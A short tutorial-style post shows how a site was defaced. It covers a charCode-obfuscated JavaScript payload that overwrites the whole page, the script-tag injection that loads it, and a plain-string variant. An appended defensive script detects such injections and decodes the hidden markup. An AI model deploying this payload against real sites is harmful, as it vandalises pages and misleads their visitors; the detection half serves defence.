It can be used to convert someone's web page into a different page without redirecting.
Some hackers used this to deface my friend's web site.
Let's say you have a web page as follows.
<html>
<head></head>
<body>
<h1>Test</h1>
</body></html>
For testing purposes, let's imagine it just prints "Test" in the browser, and that you need to deface this page to confuse the victim. For this, you first need to create the code of the web page that will be shown after the defacement. Let's say it is as follows.
<http>
<head>
<title>test err</title>
</head>
<body>
This is test hack
</body>
</html>
This changes what is printed in the browser and also the title. To do this, we first need to convert these characters into their ASCII char codes. For this, run the following code as JavaScript.
var tsstr = `<http>
<head>
<title>test err</title>
</head>
<body>
This is test hack
</body>
</html> `; // The code of the page you need to create
var rettext = "";
// Append the char code of each character, followed by a comma
for (var i = 0; i < tsstr.length; i++) {
  var n = tsstr.charCodeAt(i);
  var fulstr = n + ',';
  rettext += fulstr;
}
console.log(rettext);
This will print the char codes of the code in the console. You should copy them and add them to the code below.
document.documentElement.innerHTML=String.fromCharCode(/* copied numbers */)
According to our example, it will be as follows.
document.documentElement.innerHTML=String.fromCharCode(60,104,116,116,112,62,10,60,104,101,97,100,62,10,60,116,105,116,108,101,62,116,101,115,116,32,101,114,114,60,47,116,105,116,108,101,62,10,60,47,104,101,97,100,62,10,60,98,111,100,121,62,10,84,104,105,115,32,105,115,32,116,101,115,116,32,104,97,99,107,10,60,47,98,111,100,121,62,10,60,47,104,116,109,108,62,32)
Copy only this code into a text file and save it (test.txt). This file should be somewhere on the internet where the victim's connection can access it.
Now we can change the victim's source code in order to change the page.
<html>
<head>
</head>
<body>
<h1>Test</h1>
<script type="text/javascript" src="testhead.txt"> </script>
</body>
</html>
As you can see, we have added a script tag that refers to the malicious code we created. Now whenever a user loads this page, they will be shown the page that we created.
Note: This is what the hackers did. But instead of using ASCII char codes, you can just set innerHTML to a normal string.
document.documentElement.innerHTML="<http><head><title>test err2</title></head><body>This is test hack2</body></html>"
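For a site owner checking a page that was changed this way, the following added example (not code from the original post) lists script references that are not in a known-good list, decodes any String.fromCharCode payload, and flags scripts that overwrite the whole document. The function names and the allow-list approach are assumptions, and the sample inputs are constructed from the snippets above.

```javascript
// Added example, not from the original post. Sample inputs are constructed
// from the post's own snippets; the char-code list is shortened.
const SAMPLE_PAGE = `<html><head></head><body><h1>Test</h1>
<script type="text/javascript" src="testhead.txt"> </script>
</body></html>`;
const SAMPLE_SCRIPT =
  'document.documentElement.innerHTML=String.fromCharCode(60,104,116,116,112,62)';

// Return every <script src> value that is not in the known-good list for the page.
function unexpectedScriptSources(html, allowedSources) {
  const tags = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const allowed = new Set(allowedSources);
  return [...html.matchAll(tags)].map(m => m[1]).filter(src => !allowed.has(src));
}

// Decode each String.fromCharCode(<decimal list>) call so the hidden markup is readable.
function decodeCharCodeCalls(source) {
  const calls = /String\.fromCharCode\(([\d\s,]+)\)/g;
  return [...source.matchAll(calls)].map(m => {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    return String.fromCharCode(...codes);
  });
}

// True when the script replaces the whole document, with or without char codes.
function overwritesDocument(source) {
  return /document\.documentElement\.innerHTML\s*=/.test(source);
}

// Combine the three checks for one page and one fetched script body.
function triage(html, scriptBody, allowedSources) {
  return {
    unexpectedSources: unexpectedScriptSources(html, allowedSources),
    overwritesDocument: overwritesDocument(scriptBody),
    decodedPayloads: decodeCharCodeCalls(scriptBody),
  };
}

console.log(triage(SAMPLE_PAGE, SAMPLE_SCRIPT, []));
```

The allow-list should come from a known-good copy of the page, such as the version in source control or a backup.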